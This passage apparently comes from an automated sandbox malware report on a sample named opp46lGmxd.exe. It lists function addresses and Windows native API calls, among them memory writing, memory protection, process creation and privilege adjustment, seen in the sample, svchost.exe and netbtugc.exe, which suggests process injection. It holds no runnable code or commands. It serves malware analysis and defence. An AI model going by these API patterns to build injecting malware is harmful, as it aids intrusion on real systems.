            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02B80 NtQueryInformationFile,4_2_03A02B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02AB0 NtWaitForSingleObject,4_2_03A02AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02FA0 NtQuerySection,4_2_03A02FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02F90 NtProtectVirtualMemory,4_2_03A02F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02F60 NtCreateProcessEx,4_2_03A02F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02EA0 NtAdjustPrivilegesToken,4_2_03A02EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02E30 NtWriteVirtualMemory,4_2_03A02E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02DB0 NtEnumerateKey,4_2_03A02DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02D00 NtSetInformationFile,4_2_03A02D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02CF0 NtOpenProcess,4_2_03A02CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02CC0 NtQueryVirtualMemory,4_2_03A02CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02C00 NtQueryInformationProcess,4_2_03A02C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A03090 NtSetValueKey,4_2_03A03090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A03010 NtOpenDirectoryObject,4_2_03A03010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A03D10 NtOpenProcessToken,4_2_03A03D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A03D70 NtOpenThread,4_2_03A03D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032B7B50 NtDeleteFile,4_2_032B7B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032B7BE0 NtClose,4_2_032B7BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032B7A70 NtReadFile,4_2_032B7A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032B7920 NtCreateFile,4_2_032B7920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032B7D30 NtAllocateVirtualMemory,4_2_032B7D30
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00AC40B1
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AB8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00AB8858
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00AC545F
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A6E8000_2_00A6E800
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A8DBB50_2_00A8DBB5
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A6E0600_2_00A6E060
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AE804A0_2_00AE804A
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A741400_2_00A74140
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A824050_2_00A82405
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A965220_2_00A96522
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AE06650_2_00AE0665
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A9267E0_2_00A9267E
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A8283A0_2_00A8283A
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A768430_2_00A76843
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A989DF0_2_00A989DF
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A96A940_2_00A96A94
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AE0AE20_2_00AE0AE2
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A78A0E0_2_00A78A0E
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ABEB070_2_00ABEB07
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC8B130_2_00AC8B13
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A8CD610_2_00A8CD61
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A970060_2_00A97006
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A731900_2_00A73190
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A7710E0_2_00A7710E
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A612870_2_00A61287
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A833C70_2_00A833C7
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A8F4190_2_00A8F419
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A816C40_2_00A816C4
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A758C00_2_00A758C0
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A878D30_2_00A878D3
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A81BB80_2_00A81BB8
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A99D050_2_00A99D05
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A6FE400_2_00A6FE40
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A8BFE60_2_00A8BFE6
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A81FD00_2_00A81FD0
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_03D836400_2_03D83640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168712_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168732_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028A02_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101732_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011102_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1F32_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012902_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035002_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040268A2_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026982_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026A02_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF4A2_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D7532_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF532_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C003E62_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F02_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA3522_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC02C02_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE02742_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C001AA2_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF81CC2_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA1182_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B301002_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC81582_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD20002_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C02_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B407702_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B647502_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C6E02_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C005912_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B405352_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEE4F62_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF24462_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF6BD72_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB402_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA802_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A02_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0A9A62_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B569622_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B268B82_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E8F02_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4A8402_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B428402_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBEFA02_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE02_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC82_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60F302_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B82F282_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4F402_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52E902_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFCE932_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEEDB2_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEE262_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40E592_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B58DBF2_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3ADE02_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4AD002_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0CB52_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30CF22_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40C002_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B8739A2_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF132D2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D34C2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A02_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C02_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4B1B02_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B16B2_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F1722_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7516C2_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF70E92_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF0E02_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF0CC2_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C02_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF7B02_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDD5B02_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF75712_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF43F2_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B314602_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FB802_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB5BF02_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7DBF92_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFB762_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDDAAC2_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B85AA02_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEDAC62_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB3A6C2_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFA492_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7A462_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD59102_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B499502_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B9502_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B438E02_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD8002_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFFB12_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41F922_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFF092_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B49EB02_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FDC02_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7D732_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF1D5A2_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B43D402_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFCF22_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB9C322_2_03BB9C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A903E64_2_03A903E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039DE3F04_2_039DE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8A3524_2_03A8A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A502C04_2_03A502C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A702744_2_03A70274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A901AA4_2_03A901AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A841A24_2_03A841A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A881CC4_2_03A881CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039C01004_2_039C0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A6A1184_2_03A6A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A581584_2_03A58158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A620004_2_03A62000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039CC7C04_2_039CC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039F47504_2_039F4750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039D07704_2_039D0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039EC6E04_2_039EC6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A905914_2_03A90591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039D05354_2_039D0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A7E4F64_2_03A7E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A744204_2_03A74420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A824464_2_03A82446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A86BD74_2_03A86BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8AB404_2_03A8AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039CEA804_2_039CEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A9A9A64_2_03A9A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039D29A04_2_039D29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039E69624_2_039E6962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039B68B84_2_039B68B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039FE8F04_2_039FE8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039DA8404_2_039DA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039D28404_2_039D2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A4EFA04_2_03A4EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039C2FC84_2_039C2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039DCFE04_2_039DCFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A12F284_2_03A12F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A72F304_2_03A72F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039F0F304_2_039F0F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A44F404_2_03A44F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039E2E904_2_039E2E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8CE934_2_03A8CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8EEDB4_2_03A8EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8EE264_2_03A8EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039D0E594_2_039D0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039E8DBF4_2_039E8DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039CADE04_2_039CADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039DAD004_2_039DAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A6CD1F4_2_03A6CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A70CB54_2_03A70CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039C0CF24_2_039C0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039D0C004_2_039D0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A1739A4_2_03A1739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8132D4_2_03A8132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039BD34C4_2_039BD34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039D52A04_2_039D52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A712ED4_2_03A712ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039EB2C04_2_039EB2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039DB1B04_2_039DB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A9B16B4_2_03A9B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A0516C4_2_03A0516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039BF1724_2_039BF172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A870E94_2_03A870E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8F0E04_2_03A8F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039D70C04_2_039D70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A7F0CC4_2_03A7F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8F7B04_2_03A8F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A816CC4_2_03A816CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A6D5B04_2_03A6D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A875714_2_03A87571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8F43F4_2_03A8F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039C14604_2_039C1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039EFB804_2_039EFB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A45BF04_2_03A45BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A0DBF94_2_03A0DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8FB764_2_03A8FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A15AA04_2_03A15AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A71AA34_2_03A71AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A6DAAC4_2_03A6DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A7DAC64_2_03A7DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A43A6C4_2_03A43A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8FA494_2_03A8FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A87A464_2_03A87A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039D99504_2_039D9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039EB9504_2_039EB950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039D38E04_2_039D38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A3D8004_2_03A3D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039D1F924_2_039D1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8FFB14_2_03A8FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03993FD24_2_03993FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03993FD54_2_03993FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8FF094_2_03A8FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039D9EB04_2_039D9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039EFDC04_2_039EFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A87D734_2_03A87D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_039D3D404_2_039D3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A81D5A4_2_03A81D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A8FCF24_2_03A8FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A49C324_2_03A49C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032A15E04_2_032A15E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0329C7C74_2_0329C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0329C7D04_2_0329C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0329AA704_2_0329AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0329C9F04_2_0329C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032A30EE4_2_032A30EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032A30F04_2_032A30F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032B9FD04_2_032B9FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0388A0AF4_2_0388A0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0388B9D64_2_0388B9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0388B8B44_2_0388B8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0388ADD84_2_0388ADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0388BD6C4_2_0388BD6C
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: String function: 00A67F41 appears 35 times
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: String function: 00A80D27 appears 70 times
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: String function: 00A88B40 appears 42 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 57 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 275 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 100 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03A17E54 appears 102 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03A3EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 039BB970 appears 279 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03A4F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03A05130 appears 50 times
            Source: opp46lGmxd.exe, 00000000.00000003.1388345480.0000000003F53000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs opp46lGmxd.exe
            Source: opp46lGmxd.exe, 00000000.00000003.1384841864.00000000040AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs opp46lGmxd.exe
            Source: opp46lGmxd.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
